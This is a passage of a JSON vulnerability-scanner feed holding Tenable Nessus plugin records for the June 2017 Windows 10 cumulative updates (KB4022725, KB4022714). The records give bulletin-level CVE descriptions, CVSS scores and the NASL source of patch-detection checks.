(CVE-2017-8555)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to disclose\n the contents of memory. 
(CVE-2017-8554)\");\n # https://support.microsoft.com/en-us/help/4022725/windows-10-update-kb4022725\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c538cc09\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4022725 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-06';\nkbs = make_list(\n '4022725' # 10 1703 \n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 (1703)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date: \"06_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4022725))\n )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:27:51", "description": "The remote Windows 10 version 1511 host is missing security update KB4022714. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V instruction emulation due to a failure to properly enforce privilege levels. An attacker on a guest operating system can exploit this to gain elevated privileges on the guest. 
Note that the host operating system is not vulnerable. (CVE-2017-0193)\n\n - Multiple security bypass vulnerabilities exist in Device Guard. A local attacker can exploit these, via a specially crafted script, to bypass the Device Guard Code Integrity policy and inject arbitrary code into a trusted PowerShell process. (CVE-2017-0216, CVE-2017-0218, CVE-2017-0219)\n\n - Multiple information disclosure vulnerabilities exist in Windows Uniscribe due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website or to open a specially crafted document, to disclose the contents of memory. (CVE-2017-0282, CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in Windows Uniscribe software due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted document, to execute arbitrary code in the context of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in the Windows GDI component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website or open a specially crafted document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289, CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these, by convincing a user to open a specially crafted PDF file, to execute arbitrary code in the context of the current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in Microsoft Windows due to improper handling of cabinet files. 
An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted cabinet file, to execute arbitrary code in the context of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in tdx.sys due to a failure to check the length of a buffer prior to copying memory to it. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the DCOM object in Helppane.exe, when configured to run as the interactive user, due to a failure to properly authenticate the client. An authenticated, remote attacker can exploit this, via a specially crafted application, to run arbitrary code in another user's session after that user has logged on to the same system using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in the Windows kernel due to improper initialization of objects in memory. An authenticated, remote attacker can exploit these, via a specially crafted application, to disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462, CVE-2017-8485)\n\n - An information disclosure vulnerability exists in Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted PDF file, to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows due to improper handling of shortcuts. 
An unauthenticated, remote attacker can exploit this, by convincing a user to insert a removable drive containing a malicious shortcut and binary, to automatically execute arbitrary code in the context of the current user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit these, via a specially crafted application, to run processes in an elevated context. (CVE-2017-8465, CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in the Windows kernel due to improper initialization of objects in memory. An authenticated, remote attacker can exploit these, via a specially crafted application, to disclose sensitive information. (CVE-2017-8470, CVE-2017-8471, CVE-2017-8473, CVE-2017-8474, CVE-2017-8475, CVE-2017-8476, CVE-2017-8477, CVE-2017-8478, CVE-2017-8479, CVE-2017-8480, CVE-2017-8481, CVE-2017-8482, CVE-2017-8483, CVE-2017-8484, CVE-2017-8489, CVE-2017-8490, CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially crafted application, to bypass Unified Extensible Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the Windows Secure Kernel Mode feature due to a failure to properly handle objects in memory. A local attacker can exploit this, via a specially crafted application, to bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - A denial of service vulnerability exists in Windows due to improper handling of kernel mode requests. An unauthenticated, remote attacker can exploit this, via a specially crafted kernel mode request, to cause the machine to stop responding or reboot. 
(CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524, CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in Microsoft Edge due to a failure to properly apply the Same Origin Policy for HTML elements. An unauthenticated, remote attacker can exploit this, by convincing a user to follow a link, to load a page with malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the Windows font library due to improper handling of embedded fonts. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft document, to execute arbitrary code in the context of the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in Microsoft Edge due to a failure to properly enforce same-origin policies. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose information from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the Windows Search functionality due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, via a specially crafted SMB message, to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the Windows Search functionality due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, via a specially crafted SMB message, to disclose sensitive information. 
(CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the JavaScript scripting engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8549)\n\n - An information disclosure vulnerability exists in the Windows Graphics component due to improper handling of objects in memory. An authenticated, remote attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the Windows Graphics component due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists in DirectX due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. An authenticated, remote attacker can exploit this, via a specially crafted application, to disclose the contents of memory. 
(CVE-2017-8554)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-13T00:00:00", "type": "nessus", "title": "KB4022714: Windows 10 Version 1511 June 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0193", "CVE-2017-0216", "CVE-2017-0218", "CVE-2017-0219", "CVE-2017-0282", "CVE-2017-0283", "CVE-2017-0284", "CVE-2017-0285", "CVE-2017-0287", "CVE-2017-0288", "CVE-2017-0289", "CVE-2017-0291", "CVE-2017-0292", "CVE-2017-0294", "CVE-2017-0296", "CVE-2017-0297", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0300", "CVE-2017-8460", "CVE-2017-8462", "CVE-2017-8464", "CVE-2017-8465", "CVE-2017-8466", "CVE-2017-8468", "CVE-2017-8470", "CVE-2017-8471", "CVE-2017-8473", "CVE-2017-8474", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8477", "CVE-2017-8478", "CVE-2017-8479", "CVE-2017-8480", "CVE-2017-8481", "CVE-2017-8482", "CVE-2017-8483", "CVE-2017-8484", "CVE-2017-8485", "CVE-2017-8489", "CVE-2017-8490", "CVE-2017-8491", "CVE-2017-8492", "CVE-2017-8493", "CVE-2017-8494", "CVE-2017-8515", "CVE-2017-8517", "CVE-2017-8518", "CVE-2017-8522", "CVE-2017-8523", "CVE-2017-8524", 
"CVE-2017-8527", "CVE-2017-8530", "CVE-2017-8531", "CVE-2017-8532", "CVE-2017-8533", "CVE-2017-8543", "CVE-2017-8544", "CVE-2017-8547", "CVE-2017-8548", "CVE-2017-8549", "CVE-2017-8554", "CVE-2017-8575", "CVE-2017-8576", "CVE-2017-8579"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUN_4022714.NASL", "href": "https://www.tenable.com/plugins/nessus/100759", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100759);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2017-0193\",\n \"CVE-2017-0216\",\n \"CVE-2017-0218\",\n \"CVE-2017-0219\",\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0284\",\n \"CVE-2017-0285\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0291\",\n \"CVE-2017-0292\",\n \"CVE-2017-0294\",\n \"CVE-2017-0296\",\n \"CVE-2017-0297\",\n \"CVE-2017-0298\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8460\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n \"CVE-2017-8465\",\n \"CVE-2017-8466\",\n \"CVE-2017-8468\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8473\",\n \"CVE-2017-8474\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8489\",\n \"CVE-2017-8490\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8493\",\n \"CVE-2017-8494\",\n \"CVE-2017-8515\",\n \"CVE-2017-8517\",\n \"CVE-2017-8518\",\n \"CVE-2017-8522\",\n \"CVE-2017-8523\",\n \"CVE-2017-8524\",\n \"CVE-2017-8527\",\n \"CVE-2017-8530\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8547\",\n \"CVE-2017-8548\",\n \"CVE-2017-8549\",\n 
\"CVE-2017-8554\",\n \"CVE-2017-8575\",\n \"CVE-2017-8576\",\n \"CVE-2017-8579\"\n );\n script_bugtraq_id(\n 98818,\n 98819,\n 98820,\n 98821,\n 98824,\n 98826,\n 98833,\n 98835,\n 98836,\n 98837,\n 98839,\n 98840,\n 98843,\n 98844,\n 98845,\n 98846,\n 98847,\n 98848,\n 98849,\n 98850,\n 98852,\n 98853,\n 98854,\n 98855,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98863,\n 98865,\n 98867,\n 98869,\n 98870,\n 98878,\n 98884,\n 98885,\n 98887,\n 98895,\n 98896,\n 98897,\n 98898,\n 98900,\n 98901,\n 98902,\n 98903,\n 98914,\n 98918,\n 98920,\n 98922,\n 98923,\n 98926,\n 98928,\n 98929,\n 98930,\n 98932,\n 98933,\n 98942,\n 98954,\n 98955,\n 99210,\n 99212,\n 99215\n );\n script_xref(name:\"MSKB\", value:\"4022714\");\n script_xref(name:\"MSFT\", value:\"MS17-4022714\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/14\");\n\n script_name(english:\"KB4022714: Windows 10 Version 1511 June 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1511 host is missing security update\nKB4022714. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple security bypass vulnerabilities exist in\n Device Guard. A local attacker can exploit these, via a\n specially crafted script, to bypass the Device Guard\n Code Integrity policy and inject arbitrary code into a\n trusted PowerShell process. 
(CVE-2017-0216,\n CVE-2017-0218, CVE-2017-0219)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. 
(CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. 
An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to run\n processes in an elevated context. (CVE-2017-8465,\n CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8473, CVE-2017-8474,\n CVE-2017-8475, CVE-2017-8476, CVE-2017-8477,\n CVE-2017-8478, CVE-2017-8479, CVE-2017-8480,\n CVE-2017-8481, CVE-2017-8482, CVE-2017-8483,\n CVE-2017-8484, CVE-2017-8489, CVE-2017-8490,\n CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the\n Windows Secure Kernel Mode feature due to a failure to\n properly handle objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - A denial of service vulnerability exists in Windows due\n to improper handling of kernel mode requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted kernel mode request, to cause the\n machine to stop responding or rebooting. 
(CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. 
(CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8549)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to disclose\n the contents of memory. 
(CVE-2017-8554)\");\n # https://support.microsoft.com/en-us/help/4022714/windows-10-update-kb4022714\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?46ed25c8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4022714 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-06';\nkb = make_list(\n '4022714' # 10 1151\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kb, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # 10 (1511)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date: \"06_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4022714)))\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:27:52", "description": "The remote Windows host is missing security update KB4022715. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple security bypass vulnerabilities exist in Device Guard. 
